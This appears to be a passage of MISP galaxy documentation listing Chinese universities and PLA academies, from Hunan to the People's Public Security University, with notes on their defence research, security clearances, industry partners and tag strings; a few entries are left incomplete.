The tag is: misp-galaxy:china-defence-universities="Hunan University (湖南大学)"

Table 633. Table References

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**Hunan University of Science and Technology (湖南科技大学)**

HNUST is an engineering-focused university founded in 2003. In 2016, it was subject to a ‘joint-construction’ agreement between the Hunan Provincial Government and defence industry agency SASTIND, an arrangement designed to develop the university's involvement in defense-related research and training. The university has three designated defence research areas, is involved in weapons research, and has confidential-level security credentials. HNUST is home to two national defence key laboratories, one of which is in the School of Materials Science and Engineering. The university has also established its Intelligent Manufacturing Institute, which evolved from a provincial key laboratory and has connections to the Made in China 2025 strategy. HNUST is also linked to state-owned arms manufacturer Norinco Group. In 2018, it signed a strategic cooperation agreement with arms manufacturer Norinco’s National Defence Key Laboratory on Light Weapons Terminal Lethality Technology (轻武器终点杀伤技术国防科技重点实验室 aka 瞬态冲击技术国防科技重点实验室).

The tag is: **misp-galaxy:china-defence-universities="Hunan University of Science and Technology (湖南科技大学)"**

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**Information Engineering University (中国人民解放军信息工程大学)**

IEU was formed in June 2017, combining the old Information Engineering University with the PLA Foreign Languages University. PLA experts have described IEU as ‘the sole military academy for the cyber and electronic warfare arms of China’s network-electronic forces’. The IEU is currently subordinate to the PLA Strategic Support Force’s Network Systems Department, which holds the military’s signals intelligence capabilities. Previously, the university was run by the General Staff Department Third Department (commonly known as 3PLA), the PLA’s signals intelligence service that has been incorporated into the Strategic Support Force. IEU’s command tracks include Network Engineering (网络工程), which is dedicated to the cultivation of cyber attack and defense technical cadre (网络攻防技术干部). It is responsible for the construction of the Henan Provincial Laboratory of Visible Light Communication (河南省可见光通信重点实验室). The university is primarily known for research and training on hacking, cryptography, signals processing, surveying and mapping, and navigation technology. However, since absorbing the PLA Foreign Languages University, it now serves as one of the most important language schools for Chinese military intelligence officers, describing itself as a ‘whole-military foreign languages training base for individuals going abroad’. While the PLA Foreign Languages University is best known for training signals intelligence officers, it has also trained many officers in the PLA’s political warfare wing, the Central Military Commission Political Work Department Liaison Bureau.

The tag is: **misp-galaxy:china-defence-universities="Information Engineering University (中国人民解放军信息工程大学)"**

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Institute of NBC Defense (陆军防化学院)

The Institute of NBC Defense is the PLA's premier institution devoted to training junior, mid-career and senior officers on technology related to defence against nuclear, biological and chemical weapons. Most scientific research tends to focus on radiation protection and nuclear safety.

The tag is: *misp-galaxy:china-defence-universities*="Institute of NBC Defense (陆军防化学院)"

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Jiangnan Social University (江南社会学院)

JSU trains intelligence officers in tradecraft and carries out research on intelligence and security. The university first opened in 1986 with over 600 students and staff. Since 1999, it has run the Journal of Jiangnan Social University, which publishes research on international security, strategy and politics. Satellite and streetview imagery from Google Maps and Baidu appears to show a shooting range at the southern end of its campus.

The tag is: *misp-galaxy:china-defence-universities*="Jiangnan Social University (江南社会学院)"

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Jiangsu University of Science and Technology (江苏科技大学)

JUST engages in high levels of defence research. With a focus on research relevant to the PLA Navy, JUST is supervised by the China State Shipbuilding Corporation and the China Shipbuilding Industry Corporation, China's leading defence shipbuilding conglomerates. In 2002, JUST was one of eight universities jointly supervised by defence industry agency COSTIND and a provincial government. In 2016, it was the subject of an agreement between the Jiangsu Provincial Government and defence industry agency SASTIND to expand its role in defence research. JUST scientists have been involved in nuclear submarine, unmanned submersible and aircraft carrier projects. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects. Faculties at the university involved in defence research include the School of Naval Architecture and Ocean Engineering and the School of Energy and Propulsion.

The tag is: *misp-galaxy:china-defence-universities*="Jiangsu University of Science and Technology (江苏科技大学)"

Table 638. Table References
**Jilin University (吉林大学)**

JLU is directly under the administration of the Ministry of Education and came under the joint supervision of the ministry and defence industry agency SASTIND in 2016. In 2017, SASTIND designated eight fields of research at JLU as national defence disciplines, indicating the university carries out high levels of defence research. In 2012, JLU spent roughly RMB60 million (AUD12.5 million) on defence research, a number that is likely to have grown substantially. JLU’s National Defense Science and Technology Research Institute, also known as the Advanced Technology Research Institute, was established in April 2006 and is responsible for the organization and management of the university’s national defence science and technology projects. The research institute has received several certifications to conduct research for military applications. It conducts research in collaboration with the former PLA General Armaments Department, SASTIND, and state-owned defence conglomerates in the fields of aviation, aerospace, electronics, nuclear technology, and shipbuilding. JLU’s State Key Laboratory of Superhard Materials (超硬材料国家重点实验室) works closely with China’s nuclear weapons complex, the Chinese Academy of Engineering Physics (CAEP). Job advertisements for a CAEP subsidiary, the Center for High Pressure Science & Technology Advanced Research (北京高压科学研究中心) state that it has a branch within Jilin University. This suggests that CAEP may even be involved in managing the State Key Laboratory of Superhard Materials. The university hosts at least two defence research labs, located in the university’s College of Computer Science and Technology and in the College of Chemistry. Its Key Laboratory of Attack and Defense Simulation Technology for Naval Warfare, Ministry of Education (海战场攻防对抗仿真技术教育部重点实验室) is involved in cybersecurity research for the Navy. The lab’s academic committee is headed by a computer scientist from China Aerospace Science and Technology Corporation, a leading state-owned missile manufacturer. JLU holds secret-level security credentials, allowing it to participate in research and production for classified weapons and defence technology projects.

The tag is: *misp-galaxy:china-defence-universities="Jilin University (吉林大学)"

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**Kunming University of Science and Technology (昆明理工大学)**

Kunming University of Science and Technology appears to engage in low levels of defence research, but its involvement in defence research is likely to grow. In 2017, Kunming University of Science and Technology signed an agreement with Yunnan’s defence technology bureau to deepen military-civil fusion. In 2018, the Yunnan Provincial Government and defence industry agency SASTIND signed an agreement to jointly construct KMUST. The agreement is designed to increase the university’s involvement in defence research. KMUST carries out high levels of research on
metallurgy. It is involved in defence research related to China’s aviation industry, and collaborates with defence shipbuilding conglomerate CSIC on vibration and noise research.

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**misp-galaxy:china-defence-universities=“Kunming University of Science and Technology (昆明理工大学)”**

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**Lanzhou University (兰州大学)**

LZU's involvement in defence research has slowly grown over the past decade. In 2018, it spent over RMB50 million (AUD10 million) on defence projects. LZU is subordinate to the Ministry of Education. Since 2018, it has also been supervised by defence industry agency SASTIND in an arrangement designed to further expand the university's defence research and the defence industry relationships. LZU carries out national defence-related research in areas such as nuclear science, electromagnetism, probes, chemistry, mechanics, materials science, stealth technology and information technology. In 2017 and 2018, LZU signed strategic agreements with state-owned defence companies Norinco Group, China’s largest arms manufacturer, and China National Nuclear Corporation. Several defence companies, as well as China’s nuclear weapons program, provide scholarships for dozens of LZU postgraduate students each year. In return, these students must work for their sponsoring organisation for five years after graduation. In 2005, LZU received secret-level security credentials that allow it to participate in classified weapons projects.

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**misp-galaxy:china-defence-universities=“Lanzhou University (兰州大学)”**

Table 641. Table References

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**Lanzhou University of Technology (兰州理工大学)**

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Table 642. Table References

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**Logistics University of the People’s Armed Police Force (中国人民武装警察部队后勤学院)**

The Logistics University of the People’s Armed Police Force is an institution devoted to training
personnel in logistics for China’s paramilitary service, the People’s Armed Police. The university teaches subjects in applied economics, military logistics studies, paramilitary logistics, applied psychology, as well as communications and transportation engineering. The Logistics University of the People’s Armed Police Force actively collaborates with private institutions and civilian universities on scientific research. For example, the university collaborated with Nankai University (南开大学) and the Tianjin Eminent Electric Cell Material Company (天津爱敏特电池材料有限公司) on high performance lithium and sodium ion materials in 2018. The university also collaborated with the Tianjin Polytechnic University (天津工业大学) on intelligence, wearable technology that monitors heart rates for both military and civilian personnel.

The tag is: misp-galaxy:china-defence-universities="Logistics University of the People’s Armed Police Force (中国人民武装警察部队后勤学院)"

### Nanchang Hangkong University (南昌航空大学)

NCHU engages in high levels of defence research relevant to the aviation industry. In 2017, the Ministry of Education designated it a ‘school with national defence education characteristics’, and 30% of graduates go to work in the defence industry or civilian aviation companies. The university has been supervised by defence industry agency SASTIND since 2010. It holds secret-level security credentials. Five fields of research at NCHU are designated ‘national defence key disciplines’: precision forming and joining technology, component quality testing and control, testing and measurement technology and instruments, optoelectric and laser technology, and military-use critical materials. The university hosts at least three laboratories focused on defence research. NCHU is particularly close to AVIC, the Chinese military’s aircraft manufacturing company. In particular, AVIC subsidiary Hongdu Aviation Industry Group (洪都航空工业集团) is based in Nanchang and has frequent exchanges with NCHU.

The tag is: misp-galaxy:china-defence-universities="Nanchang Hangkong University (南昌航空大学)"

### Nanchang University (南昌大学)

NCU engages in low levels of defence research. It holds secret-level security credentials, allowing it to carry out classified defence research. In 2006, it established a defence research institute together with five provincial defence industry companies. Based on affiliated staff members, the institute may be focused on mechanical engineering. The university was added to the US Government Unverified List in 2018. Entities are added the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.
The tag is: *misp-galaxy:china-defence-universities="Nanchang University (南昌大学)"

**Table 645. Table References**

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**Nanjing Army Command College (南京陆军指挥学院)**

The Nanjing Army Command College is an institute devoted to training mid-career staff officers in preparation for command the PLA Ground Force. Disciplines of focus for the college include joint campaign tactics, warfighting command, military training and combat simulations.

The tag is: *misp-galaxy:china-defence-universities="Nanjing Army Command College (南京陆军指挥学院)"

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**Nanjing Institute of Information Technology (南京信息技术研究院)**

Nanjing Institute of Information Technology (南京信息技术研究院)

The tag is: *misp-galaxy:china-defence-universities="Nanjing Institute of Information Technology (南京信息技术研究院)"

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**Nanjing Normal University (南京师范大学)**

Nanjing Normal University is a leading Chinese university supervised by the Ministry of Education and Jiangsu Provincial Government. The university has strengths in geospatial technology, big data and artificial intelligence. Nanjing Normal University has close ties to the Ministry of Public Security. In 2014, the university established the Ministry of Public Security Key Laboratory for Police Geospatial Information Technology (警用地理信息技术公安部重点实验室), which researches applications of geospatial information technology for policing purposes. Nanjing Normal University has also entered into an agreement with the Nanjing Municipal Public Security Bureau, establishing the ‘Video GIS Technology Laboratory’ (视频GIS技术实验室) in April 2012. Nanjing Normal University has a close relationship with the regional government in Xinjiang, where over 1 million Uyghurs and Kazakhs are currently held in internment camps. In 2015, the university entered into an agreement with the Xinjiang Uyghur Autonomous Government and the Jiangsu Municipal Government to support the development of Yili Normal University.
Nanjing Tech University (南京工业大学)

In 2016, NJTech came under the joint supervision of the Jiangsu Provincial Government and defence industry agency SASTIND, which is an arrangement designed to develop the university's involvement in defense-related research and training. The university has four designated defence research areas and secret-level security credentials, allowing it to undertake classified defence technology projects. NJTech is expanding its defence research on materials science, chemistry, optical engineering and systems engineering. In 2018, the university established a Military-Civil Fusion Development Research Institute to deepen its implementation of military-civil fusion. NJTech has a Defence Industry Science Office (军工科研办公室) within its Depart of Scientific of Research. This office is responsible for the university's defence-related research and coordination. NJTech's School of Materials Science and Engineering (材料科学与工程学院) has previously worked on defence-related projects. The university has international ties with universities in England that focus on electronics and semiconductors. It has also established a joint research center with Russian universities for advanced technology R&D.

Nanjing University (南京大学)

NJU is subordinate to the MOE and has also been supervised by defence industry agency SASTIND since 2012. In 2016, the university was selected as a participant in the first batch of national dual-use demonstration bases, and a year later in 2017 was selected as a Class A world-class university. NJU is home to at least two defence laboratories and has committed to deepening its involvement in military-civilian fusion. As the first university in China to establish a State Secrecy Academy, in 2009, Nanjing University is involved in cyber security research. In 2018, NJU established an Institute of Artificial Intelligence and reported its research progress to the Jiangsu Provincial Committee of Military-Civil Fusion when they visited the university. Following the visit, the provincial committee expressed interest in deepening cooperation on MCF projects in order to promote Jiangsu's MCF work. The Institute of AI also co-built a research center with Intel, the Intel-Nanjing University Artificial Intelligence Research Center, which is Intel's first research center focusing on AI in China. The university's rapidly developing AI Institute provides an opportunity for deepening its involvement in MCF R&D. In May 2018, NJU signed a strategic cooperation agreement with Megvii 旷视科技. Megvii has been blacklisted by the US government over human rights abuses.
Nanjing University of Aeronautics and Astronautics
(南京航空航天大学)

NUAA is one of the ‘Seven Sons of National Defence’ subordinate to the Ministry of Industry and Information Technology. NUAA specialises in aerospace research and works closely with the Chinese military as well as civilian and military aviation companies, including military aircraft manufacturers AVIC and AECC. 21% of the university’s graduates in 2018 who found employment were working in the defence sector. The university claims to have participated in nearly all major national aviation projects, including the development of the Chang’e 3 unmanned lunar explorer. NUAA hosts China’s only national defence laboratory for helicopter technology. NUAA has attracted controversy for its alleged involvement in the Ministry of State Security’s efforts to steal US aviation technology.

The tag is: misp-galaxy:china-defence-universities="Nanjing University of Aeronautics and Astronautics (南京航空航天大学)"

Nanjing University of Posts and Telecommunications
(南京邮电大学)

NJUPT was initially ‘one of the earliest institutions devoted to training communications personnel for the Chinese Communist Party and red army’. Since then, NJUPT has evolved from a training college to a civilian university that offers undergraduate, post-graduate and doctoral degrees in various communications and engineering disciplines. NJUPT holds secret-level security credentials, allowing it to participate in classified defence research projects. Key areas of research include at the university:

The tag is: misp-galaxy:china-defence-universities="Nanjing University of Posts and Telecommunications (南京邮电大学)"
Nanjing University of Science and Technology (南京理工大学)

NJUST is one of the ‘Seven Sons of National Defence’ administered by the Ministry of Industry and Information Technology. Together with Beijing Institute of Technology, it was ranked as China's top university for armaments science in 2017. Roughly 16% of the university’s graduates in 2018 who found employment were working in the defence sector. NJUST is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions specialising in weapons science—the ‘B’ in ‘B8’ stands for Chinese word for armaments, bingqi (兵). Indicative of the university's high level of involvement in defence research, in 2013 a disused laboratory on its campus exploded, killing one, after workers disturbed a cache of explosives. NJUST has a collaborative relationship with a PLA signals intelligence research institute, involving cooperation on unmanned combat platforms and information security.

The tag is: misp-galaxy:china-defence-universities="Nanjing University of Science and Technology (南京理工大学)"

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National Defense University (中国人民解放军国防大学)

NDU is the PLA’s ‘premier’ institution for training in military theory, strategy, operations and political work, which can have its history traced back to the era of Mao Zedong's peasant-led red army in 1927. The university is devoted to training the PLA's officer corps in preparation for senior leadership positions. Given this focus on the softer skills of PLA administration, the National Defense University does not have as strong a focus on hard science as its counterpart, the National University of Defense Technology.

The tag is: misp-galaxy:china-defence-universities="National Defense University (中国人民解放军国防大学)"

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National University of Defense Technology (中国人民解放军国防科技大学)

In 2017, NUDT was reformed and placed in charge of the Institute of International Relations in Nanjing, the National Defense Information Institute in Wuhan, the Xi'an Communications College, the Electrical Engineering Institute in Hefei, and the College of Meteorology and Oceanography in Nanjing. The Institute of International Relations in Nanjing is a key training centre for intelligence officers. NUDT is known for its research on supercomputers, autonomous vehicles, hypersonic missiles and China’s Beidou Navigation Satellite System. The university developed the Tianhe-2A supercomputer at the National Supercomputing Center in Guangzhou, the world’s fastest
supercomputer from 2013 to 2016. NUDT’s Tianhe-1A supercomputer is based at Hunan University’s National Supercomputing Center Changsha (国家超级计算长沙中心). For over a decade, NUDT has aggressively leveraged overseas expertise and resources to build its capabilities. The Australian Strategic Policy Institute’s International Cyber Policy Centre’s October 2018 report ‘Picking flowers, making honey: The Chinese military’s collaboration with foreign universities’ documented and analysed NUDT’s overseas presence. The report found that by 2013 the university had sent over 1,600 of its professors and students to study and work abroad. Universities in the United States, the United Kingdom, Australia, Canada, Singapore, the Netherlands and Germany engage in some of the highest levels of collaboration with NUDT. Some of NUDT's leading experts on drone swarms, hypersonic missiles, supercomputers, radars, navigation and quantum physics have been sent to study or work abroad. Defected Chinese spy Wang Liqiang claimed in 2019 that NUDT’s ‘Intelligence Center’ sent him fake passports for his mission to interfere in Taiwanese politics. This indicates that the university plays an important role in supporting China’s overseas intelligence activity. NUDT also works with foreign technology companies. Google and Microsoft have both worked with and trained NUDT scientists.

The tag is: misp-galaxy:china-defence-universities="National University of Defense Technology (中国人民解放军国防科技大学)"

Table 655. Table References

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Naval Command College (中国人民解放军海军指挥学院)

The Naval Command College is an institution that provides education and training for naval officers in a variety of disciplines such as military thought, strategic studies, intelligence training and political work along with military operations, tactics and campaigns. The college plays a crucial role in improving the quality of PLA Navy personnel, as well as providing combined arms training for mid-career political commissars, logistics officers and equipment officers. The college serves to improve strategic and tactical thinking in the PLA Navy by hosting the Naval Campaigns and Tactics Center Laboratory (海军战役战术中心实验室) and producing research that looks at operationalising new training and command systems. It is the PLA-N’s last remaining command academic institution.

The tag is: misp-galaxy:china-defence-universities="Naval Command College (中国人民解放军海军指挥学院)"

Table 656. Table References

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Naval Petty Officer Academy (中国人民解放军海军士官学校)

The academy has three main departments focused on training, campus affairs and political work. It has published research on radar jamming.

The tag is: misp-galaxy:china-defence-universities="Naval Petty Officer Academy (中国人民解放军海军士官学校)"
Naval Research Academy (中国人民解放军海军研究院)

The Naval Research Academy was established in July 2017 following Xi Jinping’s military reforms. Main areas of study include military theory and technological research as well as the maritime environment and national defence engineering. The Naval Research Academy actively collaborates with civilian universities as part of China’s military-civil fusion program. In April 2019, delegates from the Naval Research Academy attended a meeting with officials from Xi’an Jiaotong University on co-operation directed at improving the quality assurance and technological reliability of complex armaments currently in service in the PLA Navy. Major General Li Wei from the Naval Research Academy stated that his colleagues were paying ‘very close attention to this co-operation with Xi’an Jiaotong University’ in the development and sustainment of naval equipment. The Naval Research Academy also collaborates with civilian research institutes. For example, the Institute for Industrial Military-Civil Fusion at the Research Institute of Machinery Industry Economic and Management claims to have worked with the Naval Research Academy and a number of state-owned enterprises that focus on defence technology such as China Shipbuilding Industry Corporation (CSIC) in order to develop strategies for military-civil fusion. The Naval Research Academy’s involvement in military-civil fusion is particularly notable for work on maritime information technology and equipment. In January 2019, delegates from the Naval Research Academy attended a conference hosted by the National Key Laboratory of Underwater Acoustic Science and Technology (水声技术国防科技重点实验室) and the Key Laboratory of Marine Information Acquisition and Security Industry and Information Technology (海洋信息获取与安全工业和信息化部重点实验室) of Harbin Engineering University (HEU). The Naval Research Academy's Liu Qingyu (刘清宇) was reported to have made a presentation on international and domestic developments in marine sonar technology at the conference. Liu Qingyu from the Naval Research Academy has a particularly strong record of engagement with civilian and military institutions for his research into marine sonar technology. In 2018, Liu delivered a presentation to the Northwestern Polytechnical University (NPU) which ‘elaborated on some of the problems facing the national coastal defence industry’ and ‘suggested areas for future research into marine acoustics.’ Both students and academics from NPU attended Liu’s presentation. Liu has also published papers on acoustic science with scholars from the Chinese Academy of Sciences, the Naval University of Engineering, and Northwestern Polytechnical University.

The tag is: misp-galaxy:china-defence-universities="Naval Research Academy (中国人民解放军海军研究院)"

Naval University of Engineering (中国人民解放军海军工程大学)

NUE is one of the PLA’s five comprehensive universities, which trains students in a variety of engineering and core military disciplines related to naval warfare. The university is home two
The National Key Laboratory for Vessel Integrated Power System Technology (舰船综合电力技术国防科技重点实验室), which was established in 2010 to carry out ‘indigenous research and development’ into integrated electric propulsion (IEP) systems that power naval vessels at sea. IEP generally uses diesel generators and/or gas turbines to generate the electricity needed in order to turn propellers on large surface vessels such as guided missile destroyers or amphibious assault ships. The lab is jointly run by NUE and China Shipbuilding Industry Corporation’s (CSIC) 712th Research Institute. Rear Admiral Ma Weiming has led the National Key Laboratory for Vessel Integrated Power System Technology to develop propulsion systems for aircraft catapults, electromagnetic weapons and satellite launches. Admiral Ma has been referred to as ‘the father of China’s electromagnetic catapult system’ (中国电磁弹射之父) by official Chinese media sources. NUE’s National Defense Technology Key Laboratory of Marine Vibration and Noise (船舶振动噪声国防科技重点实验室) works on acoustic quieting technology for submarines. The lab is probably jointly run with CSIC’s 701st Research Institute, also known as China Ship Development and Design Center (中国舰船研究设计中心). Another laboratory that conducts defence research at NUE is the Nuclear Marine Propulsion Engineering Military Key Laboratory (舰船核动力工程军队重点实验室). The lab focuses on researching and training engineers in nuclear engineering for warships and submarines. Academic departments at the Naval University of Engineering include:

The tag is: misp-galaxy:china-defence-universities="Naval University of Engineering (中国人民解放军海军工程大学)"

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**Navy Aviation University (中国人民解放军海军航空大学)**

The Navy Aviation University was established upon the merger of the Naval Aviation Pilot Academy and the Naval Aviation Engineering University during Xi Jinping’s military reforms in 2017. The university conducts research into missile engineering, electrical engineering and automation, navigation engineering as well as air station management engineering and flight vehicle design engineering. Academic articles published by the university have looked at topics such as the PLA-N’s combat system capability and naval aviation management systems.

The tag is: misp-galaxy:china-defence-universities="Navy Aviation University (中国人民解放军海军航空大学)"

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**Navy Logistics Academy (中国人民解放军海军勤务学院)**

The Navy Logistics Academy is an institution devoted to training naval cadets and officers specialising in logistics. The academy’s core training and research focuses on military studies, management science and economics, while specialist lines of research include logistics command management and military financial auditing. The Center for Naval Analyses (CNA) in Arlington,
Virginia have noted that entry into the academy tends to occur at the mid-career level for officers in the PLA-N.

The tag is: misp-galaxy:china-defence-universities="Navy Logistics Academy (中国人民解放军海军勤务学院)"

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**Navy Medical University (中国人民解放军海军军医大学)**

The PLA Navy Medical University, formerly known as the Second Military Medical University, was established in 1951 as a university focussed on medical research for the Chinese military.

The tag is: misp-galaxy:china-defence-universities="Navy Medical University (中国人民解放军海军军医大学)"

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**Navy Submarine Academy (中国人民解放军海军潜艇学院)**

The Navy Submarine Academy is responsible for the training of submariners to crew its conventionally and nuclear-powered submarines. The academy focuses its research on subjects such as electrical and information engineering, combat simulation, underwater acoustic engineering and navigation technology along with weapons systems and launch engineering and underwater ordnance technology. The academy also offers programs in combat tactics and the underwater combat environment. The Navy Submarine Academy pursues research that may contribute to Chinese anti-submarine warfare capabilities through the Underwater Operational Environment Military Key Laboratory (水下作战环境军队重点实验室). The academy also oversees part of the publication record of researchers from the Navy Submarine Academy also suggests a strong interest in foreign developments in undersea warfare systems. In 2018, the Navy Submarine Academy signed a cooperative agreement with Harbin Engineering University (HEU). The agreement is directed at promoting research collaboration in subjects such as big data fusion, intelligent navigation, underwater acoustic target recognition, and underwater unmanned intelligent control systems.

The tag is: misp-galaxy:china-defence-universities="Navy Submarine Academy (中国人民解放军海军潜艇学院)"

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North China Institute of Aerospace Engineering (北华航天工业学院)

NCIAE specialises in aerospace technology and engineering. The university is primarily run by the Hebei Provincial Government, together with the State Administration of Science, Technology and Industry for National Defense, China Aerospace Science and Technology Corporation (CASC), and China Aerospace Science and Industry Corporation (CASIC). NCIAE appears to be a major training center for CASC and CASIC, state-owned defence conglomerates that dominate China’s missile and satellite sector. NCIAE runs at least two research and development centres with CASC and was involved in the development of the Shenzhou spacecraft, Long March rockets and the DFH-5 satellite platform. In 2003, the Hebei Provincial Government, CASC and CASIC signed an agreement to jointly support NCIAE (pictured below, courtesy of NCIAE).

The tag is: *misp-galaxy:china-defence-universities="North China Institute of Aerospace Engineering (北华航天工业学院)"*

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North China University of Science and Technology (华北理工大学)

NCST was founded in 2010 and focuses on metallurgy and materials science. The university engages in growing levels of defence research since coming under the supervision of defence industry agency SASTIND in 2013. ‘Military-use critical materials’ has been designated as a key defence research area at NCST.

The tag is: *misp-galaxy:china-defence-universities="North China University of Science and Technology (华北理工大学)"*

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North University of China (中北大学)

NUC is a civilian university that specialises in defence research. It is jointly administered by the Shanxi Provincial Government and defence industry agency SASTIND. The university traces its roots back to an ordnance school established by the Eighth Route Army in 1941, and defence research is central to its identity. According to NUC’s website, ‘Our university has long established excellent and cooperative relationships with Central Military Commission departments, SASTIND, Norinco Group, China South Industries Group, China Aerospace Science and Technology Group, China Aerospace Science and Industry Group, and our graduates are spread across different areas in defence industry.’ Approximately 2000 of its graduates enter the defence industry each year.
specialises in testing and developing weapons, including tanks, missiles and explosives. Its Underground Target Damage Technology National Defense Key Subject Laboratory reportedly runs the only underground shooting range in a Chinese university. The university is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器).

The tag is: misp-galaxy:china-defence-universities="North University of China (中北大学)"

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**Northeastern University (东北大学)**

NEU is a major civilian university subordinate to the Ministry of Education. The university hosts three national laboratories, all of which are related to industrial manufacturing technology. NEU engages in growing levels of defence research. It holds secret-level security credentials allowing it to participate in classified weapons projects and hosts the defence-focused Key Laboratory of Aerodynamic Equipment Vibration and Control. In 2018, NEU was approved to build a further five laboratories that could be involved in future defence or security-related research. In 2019, NEU joined the Shenyang Aircraft Design Institute Collaborative Innovation Alliance (沈阳飞机设计研究所协同创新联盟), a group of universities and institutes, led by defence conglomerate AVIC, that are involved in the development of military aircraft. NEU also runs a National Defense Science and Technology Development Research Institute (国防科技发展研究院). In 2019, the institute’s senior deputy director was awarded a China Industry-University-Research Cooperation Military-Civil Fusion Prize.

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**Northwest Institute of Nuclear Technology (西北核技术研究所)**

NINT is one of China’s main sites of nuclear technology research. While the Chinese Academy of Engineering Physics is believed to be China’s only manufacturer of nuclear warheads, NINT likely plays a supporting role in research for nuclear weapons. It is especially active in research on lasers, which can be used in nuclear fusion reactors or weapons. Aside from nuclear technology, NINT carries out research on topics including electronics, information science, materials science, control science and chemistry. NINT has partnerships with several institutes in the Chinese Academy of Sciences, Xiangtan University, Northwestern Polytechnical University, and Xi’an Jiaotong University.

The tag is: misp-galaxy:china-defence-universities="Northwest Institute of Nuclear Technology (西北核技术研究所)"

| Table 668. Table References |
Northwestern Polytechnical University (西北工业大学)

The university is one of the ‘Seven Sons of National Defence’ subordinate to MIIT. It is heavily engaged in military research, describing itself as ‘devoted to improving and serving the national defence science and technology industry.’ NWPU’s research focuses on aviation, space and naval technology. Between 2014 and 2018, the university’s School of Mechanics, Civil Engineering and Architecture alone spent nearly RMB200 million (AUD40 million) on defence research projects. 41.25% of 2017 NWPU graduates who gained employment were working in the defence sector. NWPU is known for its development of unmanned aerial vehicles (UAVs). The only Chinese university hosting a UAV defence laboratory, NWPU produces the ASN series of UAVs though its subsidiary company, Aisheng Technology Group Co., Ltd. The Chinese military is the company’s largest customer and the company once claimed to produce 90% of China’s drones. The university has close ties to state-owned shipbuilding and aerospace conglomerates.

The tag is: misp-galaxy:china-defence-universities="Northwestern Polytechnical University (西北工业大学)"

Table 669. Table References

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Officers College of the PAP (中国人民武装警察部队警官学院)

The Officers College of the PAP was established as an institution devoted to training officers of China’s paramilitary service in command and engineering disciplines. The college’s research focusses on combat command, command information systems engineering, philosophy, law, political education, Chinese language and literature, history, mathematics, physics, applied psychology, electrical science and technology, computer science and technology, and management science and engineering. The Officers College of the PAP is especially active in developing drone technology. On 26 June 2019, the college tested its X-Swift unmanned aerial vehicles (UAV) for a test surveillance and reconnaissance flight with special operations personnel in Sichuan. The college is also active in developing applications for drone technology. Researchers from the college have collaborated with personnel from the PLA Logistics Engineering University to publish an article in favour of deploying UAVs to southern Xinjiang for counter-terrorism missions. The researchers argue for UAVs to be deployed for regional surveillance and strike as well as search and seizure missions in Xinjiang, drawing off lessons from the US coalition against ISIS.

The tag is: misp-galaxy:china-defence-universities="Officers College of the PAP (中国人民武装警察部队警官学院)"

Table 670. Table References

Links
PAP NCO College (中国人民武装警察部队士官学校)

The PAP NCO College was established in 2017 following Xi Jinping’s reforms to China’s military education system. The college does not appear to engage in significant levels of defence research and focuses its attention on training enlisted personnel in China’s paramilitary service, the People’s Armed Police.

The tag is: misp-galaxy:china-defence-universities=“PAP NCO College (中国人民武装警察部队士官学校)”

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Peking University (北京大学)

PKU is considered among China’s most prestigious universities with a storied history. It is ranked as one of China’s top two academic institutions, along with Tsinghua University. Unsurprisingly, the university has been included in a number of the PRC’s educational initiatives, including as a Class A institution under the Double First-Class University program. PKU has been subject to at least two joint-supervision agreements between the Ministry of Education and defence industry agency SASTIND. These agreements, signed in 2012 and 2016, are designed to deepen the university’s involvement in defence research. PKU’s Advanced Technology Institute was founded in 2006 to oversee and develop the university’s defence research. Includes several research centres and supervises the university’s four major defence laboratories. The institute’s research covers semiconductors, nuclear technology, quantum physics, advanced materials, underwater acoustics, satellite navigation and communications, flight propulsion, aerospace engineering and microprocessors. In 2017, PKU and the Chinese Academy of Engineering Physics (CAEP)—China’s nuclear weapons program—established the PKU–CAEP New Structure Center for Applied Physics and Technology (北京大学-中国工程物理研究院新结构应用物理与技术研究中心). The institution was founded on the basis of the PKU Center for Applied Physics and Technology (北京大学应用物理与技术研究中心) established with CAEP in 2007. The joint centre carries out research on materials, lasers for atomic physics applications, laser plasma physics, computer science and fluid dynamics. PKU’s report on the centre notes that it will serve China’s national defence needs and that CAEP’s deputy director emphasised it should ‘take the path of military-civil fusion’. The joint centre’s honorary director and founding director, He Xiantu, is credited as the developer of China’s first neutron bomb. PKU takes precautions for the protection of classified information. The university has an office devoted to the secure handling of classified information, hosting regular meetings and training sessions to strengthen the university’s security culture. In 2006, the university received security credentials for participation in classified defence research.

The tag is: misp-galaxy:china-defence-universities=“Peking University (北京大学)”

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People’s Armed Police Command College (中国人民武装警察指挥学院)

The PAP Command College is an institution devoted to training officers in China’s paramilitary service, the People’s Armed Police, that was established in 1984. The college’s key subjects focus on law, engineering, military studies and management studies, but most attention is devoted to paramilitary training and political work. The PAP Command College maintains a focus on paramilitary training, but it does retain a scientific research program. Drone technology is another area of interest for the PAP Command College. The college was involved in testing the X-Swift unmanned aerial vehicle (UAV) in June 2019. Kang Jian from the college’s Scientific Research Department also attended the 2017 Drone World Congress hosted in Shenzhen.

The tag is: misp-galaxy:china-defence-universities="People’s Armed Police Command College (中国人民武装警察指挥学院)"

Table 673. Table References


People’s Public Security University of China (中国人民公安大学)

PPSUC was founded in July 1948. In 1984, it was developed into a full-time higher education institution with master’s and bachelor’s degree programs. In 1998, it was merged with the Chinese People’s Police University (中国人民警官大学). Its schools include a Marxism School, Law School, Law and Order School, Investigation and Anti-Terrorism School, Criminology School, Public Security Management School, International Policing and Law Enforcement School, Police Training College (which covers combat training and command and tactical training), Criminal Science and Technology School, Information Technology and Network Security School, and a Traffic Management School. PPSUC is involved in the development of technological tools for public security applications, including image recognition. For instance, the university signed an agreement with Chinese video surveillance equipment manufacturer Hikvision in 2016 to set up a joint laboratory on video image recognition technology. In 2018, it signed a strategic cooperation agreement with Xiamen Meiya Pico Information Co., a Chinese company that provides digital forensics and information security products, which included upgrading a forensics laboratory and establishing a cyber security attack and defence laboratory. The university also has cooperation agreements with numerous local government-level public security bureaus across the PRC. These include agreements on image recognition technology for local public security bureaus and joint laboratories. For instance, in 2018 alongside the Nanshan sub-bureau of Shenzhen Public Security Bureau and the artificial intelligence companies SenseTime and Shenzhen Yuantian Lifei, it signed a strategic cooperation agreement on applying video recognition and the establishment of a joint laboratory.

